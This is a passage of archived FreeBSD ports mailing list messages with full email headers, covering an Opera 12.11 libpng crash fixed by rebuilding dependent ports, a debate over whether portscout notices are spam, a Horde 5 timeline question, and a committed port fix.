15:24:31 -0800 (PST) Received: by 10.223.71.199 with HTTP; Tue, 27 Nov 2012 15:24:31 -0800 (PST) In-Reply-To: <201211271540.39268.lumiwa@gmail.com> References: <201211270534.31383.lumiwa@gmail.com> <50B4C96D.9040109@pukruppa.de> <201211271540.39268.lumiwa@gmail.com> Date: Tue, 27 Nov 2012 15:24:31 -0800 Message-ID: Subject: Re: opera 12.11 From: Kevin Oberman To: ajtiM Content-Type: text/plain; charset=UTF-8 Cc: Peter Ulrich Kruppa , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 23:24:33 -0000 On Tue, Nov 27, 2012 at 1:40 PM, ajtiM wrote: > On Tuesday 27 November 2012 08:08:45 Peter Ulrich Kruppa wrote: >> On 27.11.2012 12:34, ajtiM wrote: >> > Hi! >> > >> > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my >> > FreeBSD 9.1 RC-3 doen't works anymore: >> > >> > opera >> > libpng error: incorrect data check >> > libpng error: incorrect data check >> > libpng error: incorrect data check >> > Segmentation fault (core dumped) >> >> It is quite a while since, but did you update your graphics/png properly? >> Please check /usr/ports/UPDATING 20120531 . >> >> Greetings >> >> Peter >> >> > Thanks in advance. >> > >> > P.S. >> > >> > I used Clang to build Opera. >> > >> > Mitja >> > -------- >> > http://www.redbubble.com/people/lumiwa >> > _______________________________________________ >> > freebsd-ports@freebsd.org mailing list >> > http://lists.freebsd.org/mailman/listinfo/freebsd-ports >> > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" >> >> _______________________________________________ >> freebsd-ports@freebsd.org mailing list >> http://lists.freebsd.org/mailman/listinfo/freebsd-ports >> To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > > As I remember I did portmaster -r png- and it build one day.... > > Opera 12.10 and before didn't have problems... Try "pkg_libchk -o". If you don't have it, install sysutils/bsdadminscripts. It can save a LOT of time over portmaster -r as many ports that will be re-installed with portmaster are dependent on other ports that use png, but don't use it directly, so don't need to be re-built. In many cases only about 10% of the ports that "depend" on some library actually link to the sharable, though png is linked to far more things than most. An occasional run will also catch oversights, like missing an UPDATING entry or having a shareable version updated, but not entered into UPDATING. I think it should be a part of the weekly periodic run. (I also think it should be in the base system.) I am not sure if pkg_libchk works with pkgng. Dominic? -- R. Kevin Oberman, Network Engineer E-mail: kob6558@gmail.com From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 23:55:57 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 4412151C for ; Tue, 27 Nov 2012 23:55:57 +0000 (UTC) (envelope-from lumiwa@gmail.com) Received: from mail-ia0-f182.google.com (mail-ia0-f182.google.com [209.85.210.182]) by mx1.freebsd.org (Postfix) with ESMTP id EE93A8FC12 for ; Tue, 27 Nov 2012 23:55:56 +0000 (UTC) Received: by mail-ia0-f182.google.com with SMTP id x2so11876297iad.13 for ; Tue, 27 Nov 2012 15:55:56 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject:date:user-agent:cc:references:in-reply-to :mime-version:content-type:content-transfer-encoding:message-id; bh=uUXJ06OAerJsA5gnUAv0JaKQuwp48BSKH5344Gjy1UQ=; b=ZWmYSUrF0xbiAzr940dVLI9gBhVrsSggVmjN7MY5fzWMDKHJQWQG5Vksag6QP+dCzR 0tkf0ihGN0N3T7YxLiZBGVN+w3HmE/n3OS8J40aDEUpdIKvpe+fCdy6dQw0rwbxAIkl1 30rrBSDBJmYsX5dJ2PBDzOW81qf5QOl7GXYzTAxPatWjr3qVr+mBtN62gQFZs+LYmyXa xCfnwOxPiIl25t3u/slBn2jbvOMWYL83JN4ilCHbFOy6d7gTKNoPvNFE3pJcp7jpPVV5 36GvR6gu8RMknlVgpl6fZvO7jDqly29g8Ll84dTb24xneZFe1VoU9x0DxuwoB1OPBQvw jX3Q== Received: by 10.50.184.226 with SMTP id ex2mr17420103igc.6.1354060556330; Tue, 27 Nov 2012 15:55:56 -0800 (PST) Received: from luna.wi.rr.com (cpe-184-58-138-79.wi.res.rr.com. [184.58.138.79]) by mx.google.com with ESMTPS id ff4sm2816766igc.13.2012.11.27.15.55.55 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 27 Nov 2012 15:55:55 -0800 (PST) From: ajtiM To: Kevin Oberman Subject: Re: opera 12.11 Date: Tue, 27 Nov 2012 17:55:45 -0600 User-Agent: KMail/1.13.7 (FreeBSD/9.1-RC3; KDE/4.8.4; i386; ; ) References: <201211270534.31383.lumiwa@gmail.com> <201211271540.39268.lumiwa@gmail.com> In-Reply-To: MIME-Version: 1.0 Content-Type: Text/Plain; charset="utf-8" Content-Transfer-Encoding: 7bit Message-Id: <201211271755.45804.lumiwa@gmail.com> Cc: Peter Ulrich Kruppa , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 23:55:57 -0000 On Tuesday 27 November 2012 17:24:31 Kevin Oberman wrote: > On Tue, Nov 27, 2012 at 1:40 PM, ajtiM wrote: > > On Tuesday 27 November 2012 08:08:45 Peter Ulrich Kruppa wrote: > >> On 27.11.2012 12:34, ajtiM wrote: > >> > Hi! > >> > > >> > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my > >> > FreeBSD 9.1 RC-3 doen't works anymore: > >> > > >> > opera > >> > libpng error: incorrect data check > >> > libpng error: incorrect data check > >> > libpng error: incorrect data check > >> > Segmentation fault (core dumped) > >> > >> It is quite a while since, but did you update your graphics/png > >> properly? Please check /usr/ports/UPDATING 20120531 . > >> > >> Greetings > >> > >> Peter > >> > >> > Thanks in advance. > >> > > >> > P.S. > >> > > >> > I used Clang to build Opera. > >> > > >> > Mitja > >> > -------- > >> > http://www.redbubble.com/people/lumiwa > >> > _______________________________________________ > >> > freebsd-ports@freebsd.org mailing list > >> > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > >> > To unsubscribe, send any mail to > >> > "freebsd-ports-unsubscribe@freebsd.org" > >> > >> _______________________________________________ > >> freebsd-ports@freebsd.org mailing list > >> http://lists.freebsd.org/mailman/listinfo/freebsd-ports > >> To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > > > > As I remember I did portmaster -r png- and it build one day.... > > > > Opera 12.10 and before didn't have problems... > > Try "pkg_libchk -o". If you don't have it, install > sysutils/bsdadminscripts. It can save a LOT of time over portmaster -r > as many ports that will be re-installed with portmaster are dependent > on other ports that use png, but don't use it directly, so don't need > to be re-built. In many cases only about 10% of the ports that > "depend" on some library actually link to the sharable, though png is > linked to far more things than most. > > An occasional run will also catch oversights, like missing an UPDATING > entry or having a shareable version updated, but not entered into > UPDATING. I think it should be a part of the weekly periodic run. (I > also think it should be in the base system.) > > I am not sure if pkg_libchk works with pkgng. Dominic? I am running pkg_libck -o and everything is corrup because it calls pkg_info (I use pkgng). Mitja -------- http://www.redbubble.com/people/lumiwa From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 00:45:59 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 7CCCBF03 for ; Wed, 28 Nov 2012 00:45:59 +0000 (UTC) (envelope-from lumiwa@gmail.com) Received: from mail-ie0-f182.google.com (mail-ie0-f182.google.com [209.85.223.182]) by mx1.freebsd.org (Postfix) with ESMTP id 38A088FC14 for ; Wed, 28 Nov 2012 00:45:59 +0000 (UTC) Received: by mail-ie0-f182.google.com with SMTP id s9so16170702iec.13 for ; Tue, 27 Nov 2012 16:45:58 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject:date:user-agent:cc:references:in-reply-to :mime-version:content-type:content-transfer-encoding:message-id; bh=ov7IvooZlJ6aJWpLS2oNKaTpjKrtVOYTkuEaxHL3pv4=; b=r34nVswThdw/EwDWuBwwNFTgWnvA/6TzEFPkm3dJF3rprNiO3UXJr3oj7yb2xwytTI qna31uVF1nl/XMonwzYQZTixzlyiYmPyu1wxFJoN5Qan2XBIprubJflh4nh/U3LQ/Upv ccEUHxbVHxSp26Ce1vsq65M2VJ1Biyoa9fz5mf9+IVgdjKfbAhqPmBazXerJhHShFXra MI3fksLEm0FrLbwoso5PmbusGkIqKgay56GNVg+7nAPIc0J07Qm3wAaz5IHVgkESwDVm JreGAvRJliKFfZlo9bCpJ7dw8plQXjZlyPTi180Hn0dNXRzL8Zi/a88QYcmCSsMkh0Fs mWQQ== Received: by 10.43.46.2 with SMTP id um2mr15268475icb.18.1354063558888; Tue, 27 Nov 2012 16:45:58 -0800 (PST) Received: from luna.wi.rr.com (cpe-184-58-138-79.wi.res.rr.com. [184.58.138.79]) by mx.google.com with ESMTPS id v12sm3181924igv.3.2012.11.27.16.45.56 (version=TLSv1/SSLv3 cipher=OTHER); Tue, 27 Nov 2012 16:45:58 -0800 (PST) From: ajtiM To: Kevin Oberman Subject: Re: opera 12.11 Date: Tue, 27 Nov 2012 18:45:47 -0600 User-Agent: KMail/1.13.7 (FreeBSD/9.1-RC3; KDE/4.8.4; i386; ; ) References: <201211270534.31383.lumiwa@gmail.com> <201211271540.39268.lumiwa@gmail.com> In-Reply-To: MIME-Version: 1.0 Content-Type: Text/Plain; charset="utf-8" Content-Transfer-Encoding: 7bit Message-Id: <201211271845.48100.lumiwa@gmail.com> Cc: Peter Ulrich Kruppa , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 00:45:59 -0000 On Tuesday 27 November 2012 17:24:31 Kevin Oberman wrote: > On Tue, Nov 27, 2012 at 1:40 PM, ajtiM wrote: > > On Tuesday 27 November 2012 08:08:45 Peter Ulrich Kruppa wrote: > >> On 27.11.2012 12:34, ajtiM wrote: > >> > Hi! > >> > > >> > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my > >> > FreeBSD 9.1 RC-3 doen't works anymore: > >> > > >> > opera > >> > libpng error: incorrect data check > >> > libpng error: incorrect data check > >> > libpng error: incorrect data check > >> > Segmentation fault (core dumped) > >> > >> It is quite a while since, but did you update your graphics/png > >> properly? Please check /usr/ports/UPDATING 20120531 . > >> > >> Greetings > >> > >> Peter > >> > >> > Thanks in advance. > >> > > >> > P.S. > >> > > >> > I used Clang to build Opera. > >> > > >> > Mitja > >> > -------- > >> > http://www.redbubble.com/people/lumiwa > >> > _______________________________________________ > >> > freebsd-ports@freebsd.org mailing list > >> > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > >> > To unsubscribe, send any mail to > >> > "freebsd-ports-unsubscribe@freebsd.org" > >> > >> _______________________________________________ > >> freebsd-ports@freebsd.org mailing list > >> http://lists.freebsd.org/mailman/listinfo/freebsd-ports > >> To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > > > > As I remember I did portmaster -r png- and it build one day.... > > > > Opera 12.10 and before didn't have problems... > > Try "pkg_libchk -o". If you don't have it, install > sysutils/bsdadminscripts. It can save a LOT of time over portmaster -r > as many ports that will be re-installed with portmaster are dependent > on other ports that use png, but don't use it directly, so don't need > to be re-built. In many cases only about 10% of the ports that > "depend" on some library actually link to the sharable, though png is > linked to far more things than most. > > An occasional run will also catch oversights, like missing an UPDATING > entry or having a shareable version updated, but not entered into > UPDATING. I think it should be a part of the weekly periodic run. (I > also think it should be in the base system.) > > I am not sure if pkg_libchk works with pkgng. Dominic? After rebuilding kdebindings4, kdebindings4-perl-perlqt and kdebindings4-perl- perlkde, pkg_libchk didn't find any problem. Mitja -------- http://www.redbubble.com/people/lumiwa From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 01:03:18 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 7B234535 for ; Wed, 28 Nov 2012 01:03:18 +0000 (UTC) (envelope-from bryan-lists@shatow.net) Received: from secure.xzibition.com (secure.xzibition.com [173.160.118.92]) by mx1.freebsd.org (Postfix) with ESMTP id 209A08FC08 for ; Wed, 28 Nov 2012 01:03:17 +0000 (UTC) DomainKey-Signature: a=rsa-sha1; c=nofws; d=shatow.net; h=message-id :date:from:mime-version:to:cc:subject:references:in-reply-to :content-type:content-transfer-encoding; q=dns; s=sweb; b=tx9rC+ Krk7zEMdmvDriY/drW38V96OCUAyUFsDjf5hdBNTWpdmCLtLBzTPMajg2Fvxs8Qc clpflBdPzi/XksYbxSfVRtxsm3kbs22vv90F5wKaN+L8DqOokLPsnTQmRWGeWZu4 JrhKytueQE1dx5UixAj/BQyC9igiTH2MdbdFk= DKIM-Signature: v=1; a=rsa-sha256; c=simple; d=shatow.net; h=message-id :date:from:mime-version:to:cc:subject:references:in-reply-to :content-type:content-transfer-encoding; s=sweb; bh=IUGLt4j470sy O80RBoiWWBYZ5wxeX150WmKTwJrTU+s=; b=hXIHy0F2zDLQ+W9zstVV6uO5tCNT IdTKgAal8VILBTeCIFHHQLPhwEDHjdsXCDlQWDA69e3RfLn1qUbU+eKb3sGa4WZG DZdwwuaPyMipJmogrtOHqj2J7r2h54hRFZZ84Qqb1z2wLrx4Ksex77wtSiihFRsx sKLyxQP+fYaTsL8= Received: (qmail 55379 invoked from network); 27 Nov 2012 19:03:09 -0600 Received: from unknown (HELO ?192.168.0.74?) (bryan@shatow.net@74.94.87.209) by sweb.xzibition.com with ESMTPA; 27 Nov 2012 19:03:09 -0600 Message-ID: <50B562D0.6070700@shatow.net> Date: Tue, 27 Nov 2012 19:03:12 -0600 From: Bryan Drewery User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Radim Kolar Subject: Re: FreeBSD ports you maintain which are out of date References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> In-Reply-To: <50B4E664.6030606@filez.com> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 01:03:18 -0000 On 11/27/2012 10:12 AM, Radim Kolar wrote: > can be this daily spam turned off? i emailed there > > portscout@portscout.freebsd.org > > but message was not delivered > I for one am actually using this to chip-in and update ports@ maintained ports. Just filter it out - it's no different than other notices to ports@ regarding open PR, deprecated ports, etc. Bryan From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 01:15:24 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id DF184D3E for ; Wed, 28 Nov 2012 01:15:24 +0000 (UTC) (envelope-from FreeBSD@shaneware.biz) Received: from ipmail05.adl6.internode.on.net (ipmail05.adl6.internode.on.net [IPv6:2001:44b8:8060:ff02:300:1:6:5]) by mx1.freebsd.org (Postfix) with ESMTP id 1E8668FC12 for ; Wed, 28 Nov 2012 01:15:23 +0000 (UTC) Received: from ppp247-71.static.internode.on.net (HELO leader.local) ([203.122.247.71]) by ipmail05.adl6.internode.on.net with ESMTP; 28 Nov 2012 11:45:23 +1030 Message-ID: <50B56392.9060506@ShaneWare.Biz> Date: Wed, 28 Nov 2012 11:36:26 +1030 From: Shane Ambler User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:16.0) Gecko/20121030 Thunderbird/16.0.2 MIME-Version: 1.0 To: Kevin Oberman Subject: Re: FreeBSD ports you maintain which are out of date References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: ports@freebsd.org, portscout@portscout.zi0r.com, Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 01:15:24 -0000 On 28/11/2012 09:45, Kevin Oberman wrote: > On Tue, Nov 27, 2012 at 8:12 AM, Radim Kolar wrote: >> can be this daily spam turned off? i emailed there >> >> portscout@portscout.freebsd.org >> >> but message was not delivered > > It's not spam, but a very useful service. I you don't work on any > ports, you should be able to filter it very easily with procmail or > your mail reader. > Probably more to the point is that it shouldn't get sent to the ports mailing list - just to port maintainers. Maybe once a month a list can be sent to the mailing list that would be unmaintained ports that need updating? From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 01:24:23 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8438FDA for ; Wed, 28 Nov 2012 01:24:23 +0000 (UTC) (envelope-from stephen@missouri.edu) Received: from wilberforce.math.missouri.edu (wilberforce.math.missouri.edu [128.206.184.213]) by mx1.freebsd.org (Postfix) with ESMTP id 455888FC08 for ; Wed, 28 Nov 2012 01:24:23 +0000 (UTC) Received: from [127.0.0.1] (wilberforce.math.missouri.edu [128.206.184.213]) by wilberforce.math.missouri.edu (8.14.5/8.14.5) with ESMTP id qAS1O8aF068816; Tue, 27 Nov 2012 19:24:09 -0600 (CST) (envelope-from stephen@missouri.edu) Message-ID: <50B567B8.7040104@missouri.edu> Date: Tue, 27 Nov 2012 19:24:08 -0600 From: Stephen Montgomery-Smith User-Agent: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Shane Ambler Subject: Re: FreeBSD ports you maintain which are out of date References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> In-Reply-To: <50B56392.9060506@ShaneWare.Biz> X-Enigmail-Version: 1.4.6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: ports@freebsd.org, portscout@portscout.zi0r.com, Kevin Oberman , Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 01:24:23 -0000 On 11/27/2012 07:06 PM, Shane Ambler wrote: > On 28/11/2012 09:45, Kevin Oberman wrote: >> On Tue, Nov 27, 2012 at 8:12 AM, Radim Kolar wrote: >>> can be this daily spam turned off? i emailed there >>> >>> portscout@portscout.freebsd.org >>> >>> but message was not delivered >> >> It's not spam, but a very useful service. I you don't work on any >> ports, you should be able to filter it very easily with procmail or >> your mail reader. >> > > Probably more to the point is that it shouldn't get sent to the ports > mailing list - just to port maintainers. > > Maybe once a month a list can be sent to the mailing list that would be > unmaintained ports that need updating? To put in my 2 cents, I think it is a great service. I don't have a problem with info about unmaintained ports being sent to the ports mailing list quite often. There are already many emails on the ports mailing list that don't interest me. So a few more is not going to be a problem. And if it causes people to update a few of the unmaintained ports, it is doing a great job. On the other hand, poutscout also seems to keep a web page, so maybe a once a month email, with a reminder about the web page, would also be helpful. Let me add that it has definitely helped me keep up to date with the ports I maintain. Whatever else it is, spam it is not. Stephen From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 01:35:11 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id F2D222A0; Wed, 28 Nov 2012 01:35:10 +0000 (UTC) (envelope-from freebsd@ips.gov.au) Received: from gatekeeper.ips.gov.au (ns.ips.gov.au [138.24.1.34]) by mx1.freebsd.org (Postfix) with SMTP id E04328FC12; Wed, 28 Nov 2012 01:35:08 +0000 (UTC) Received: from gpo.dmz.ips.gov.au (gpo.dmz.ips.gov.au [138.24.8.4]) by gatekeeper.ips.gov.au (Postfix) with ESMTP id 481451202BA; Wed, 28 Nov 2012 12:29:55 +1100 (EST) Received: from gpo.dmz.ips.gov.au (localhost [127.0.0.1]) by gpo.dmz.ips.gov.au (Postfix) with ESMTP id 413DF192A79; Wed, 28 Nov 2012 12:29:55 +1100 (EST) X-Virus-Scanned: amavisd-new at ips.gov.au Received: from gpo.dmz.ips.gov.au ([127.0.0.1]) by gpo.dmz.ips.gov.au (gpo.dmz.ips.gov.au [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id igg5ycKcxu1A; Wed, 28 Nov 2012 12:29:51 +1100 (EST) Message-ID: <50B5690F.30404@ips.gov.au> Date: Wed, 28 Nov 2012 12:29:51 +1100 From: "Campbell (Freebsd support, IT HO)" Organization: IPS Radio & Space Services User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:16.0) Gecko/20121108 Thunderbird/16.0.2 MIME-Version: 1.0 To: horde@FreeBSD.org Subject: FreeBSD Port: horde-4.0.15 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: ports@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 01:35:11 -0000 G'Day Is there a timeline for the Horde 5 Application Framework to be added to the ports collection? From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 02:20:33 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 5B7A6EB9 for ; Wed, 28 Nov 2012 02:20:33 +0000 (UTC) (envelope-from kpaasial@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id 179428FC18 for ; Wed, 28 Nov 2012 02:20:32 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so17774800vcb.13 for ; Tue, 27 Nov 2012 18:20:32 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=NF8Zd0WReLeoqIwWRjh0wplYICgPUAhJBxqHvpLvdHc=; b=yJO97yO5678QREfer6pf8LYPCuDwPvFsfp+tXqFvcvoZERIt/PxVvnClqR/btKzqEo eHwIE3yBJOUMn3veWBkykFtEsQxbuf5ZP0BhzNcNW7bP31u7ZjGqm7m8vuU31w+AIOoD wv6CbD0bS8gUrVTW8HYXRZna8fOImWBBpcHKnd+QbZjwXA9B1UXtEXssSBe2JILoazsu NMjVBDDrlT2EUlSwSq77MTCnxzqwDssUZYVAgNBtt966L9RJS4Oy4Kdtf6uf9XnFEisU YR++/ImHVUz+RuJ2kwCWxBQkpI+qOprACh5U6sGDgY2LBidhbtfgXpKHY0OA43v9Lb3p 80/g== MIME-Version: 1.0 Received: by 10.58.198.135 with SMTP id jc7mr27591176vec.51.1354069232289; Tue, 27 Nov 2012 18:20:32 -0800 (PST) Received: by 10.58.209.163 with HTTP; Tue, 27 Nov 2012 18:20:32 -0800 (PST) Date: Wed, 28 Nov 2012 04:20:32 +0200 Message-ID: Subject: ports/173593 From: Kimmo Paasiala To: freebsd-ports@freebsd.org Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 02:20:33 -0000 Hello, Could someone with commit rights commit a fix to audio/firefly? The PR is ports/173593. It' a very simple fix and it's already been approved by the maintainer. -Kimmo From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 03:05:05 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 18455FF9 for ; Wed, 28 Nov 2012 03:05:05 +0000 (UTC) (envelope-from lists@eitanadler.com) Received: from mail-la0-f54.google.com (mail-la0-f54.google.com [209.85.215.54]) by mx1.freebsd.org (Postfix) with ESMTP id 85E0E8FC14 for ; Wed, 28 Nov 2012 03:05:04 +0000 (UTC) Received: by mail-la0-f54.google.com with SMTP id j13so12557681lah.13 for ; Tue, 27 Nov 2012 19:05:03 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=eitanadler.com; s=0xdeadbeef; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type; bh=s/AHIabhOeIU9EQRwd0DyRD6eW7Iy0saY9kEbMwPte0=; b=eqzDsTQDtLLg9P/y8lNLvC/XexDFfG20IMRwn/MWU1iD4G5hqXRktnKgKJ2alF4UDR VbHnAehosyqZM1WgKzTeJHr+dkcujgvptztXd/mDL6m5rWVxhe14OqPhtFpUgEfOnrHd hxo8Ki8a5IY6wDaeqkyj2zo1xV/VGmTGqjfBw= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type:x-gm-message-state; bh=s/AHIabhOeIU9EQRwd0DyRD6eW7Iy0saY9kEbMwPte0=; b=ZD5fjcAql68uNpcVpKt3urD9KQBsW749rp59TgtsmxBV5I14CG8WFogthL2lUJyOn7 0IDyRjn4Z23yGBIHyGOWse+kiI1QcmXM6DDNKtVf+TbkWNOf/Eq6COl0+jDD5PDa2141 0BjHDKfVz+cU5yI7c3eDuO4HiaczicMj328/LdJSqRPVsH1o+g9/BbSwhJsnmwqHu/if VJIJxSGJ1bJuSvNU6KpC42HgvMsSFQk/axoRx54JkxVT/bpPTDkPD2b+IeenphVVBISe Ws57jPiP3i7tHmXLIEslvElRXgF8FTHEsrMLbonwqChdPxG3ceKIZyq5Mq4IobgS9F7P EG1Q== Received: by 10.152.108.197 with SMTP id hm5mr16683760lab.45.1354071903116; Tue, 27 Nov 2012 19:05:03 -0800 (PST) MIME-Version: 1.0 Received: by 10.112.154.168 with HTTP; Tue, 27 Nov 2012 19:04:32 -0800 (PST) In-Reply-To: References: From: Eitan Adler Date: Tue, 27 Nov 2012 22:04:32 -0500 Message-ID: Subject: Re: ports/173593 To: Kimmo Paasiala Content-Type: text/plain; charset=UTF-8 X-Gm-Message-State: ALoCoQmk/JxRxZBQEpTZRXBw0zu0zh3T7j75o6eEE0uaES7rtkUaCkCwbtoT63Wg7dpttv2g76JM Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 03:05:05 -0000 On 27 November 2012 21:20, Kimmo Paasiala wrote: > Hello, > > Could someone with commit rights commit a fix to audio/firefly? The PR > is ports/173593. done -- Eitan Adler From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 04:34:19 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id DEE62D37 for ; Wed, 28 Nov 2012 04:34:19 +0000 (UTC) (envelope-from kpaasial@gmail.com) Received: from mail-vc0-f182.google.com (mail-vc0-f182.google.com [209.85.220.182]) by mx1.freebsd.org (Postfix) with ESMTP id 8D6A08FC0C for ; Wed, 28 Nov 2012 04:34:19 +0000 (UTC) Received: by mail-vc0-f182.google.com with SMTP id fo13so17870949vcb.13 for ; Tue, 27 Nov 2012 20:34:18 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=b4U6dSYNuGuKasVHBr163NLqEqFnw4FIn3pjYxe3Mk4=; b=U+LJxxBkbZ86wEvoOXonbHcv3/T45pGBu/kuuSVq0CVDfTbPv/e1UisUbbm3gyO+zZ 6rMGo8GQpyVvcDP212Y6tAbYDIX9dX4pINVmQzsj/vAO7MxnoiiQ7En3Rw4rF/qaOoAa +AZCpSYftxKysHq+y8wPNKwNEa3LmeU1aL+EJjIOgP6BC0JxiokD7dSXY4HCTBRvaOE1 SEuGlEKoHeUFxhYaLfFySt75PLrewwtREkAQfhH23kwwVYL6xgfDmTvB1SWzd2Tipqp5 G3FLWWIo2ZOr8wMQeHa/hL78k7MPH3B9sY5zDoGe/xgpFVtL2SK5T9DFjiWuytStLFvM ghSA== MIME-Version: 1.0 Received: by 10.220.149.142 with SMTP id t14mr27620513vcv.46.1354077258403; Tue, 27 Nov 2012 20:34:18 -0800 (PST) Received: by 10.58.209.163 with HTTP; Tue, 27 Nov 2012 20:34:18 -0800 (PST) 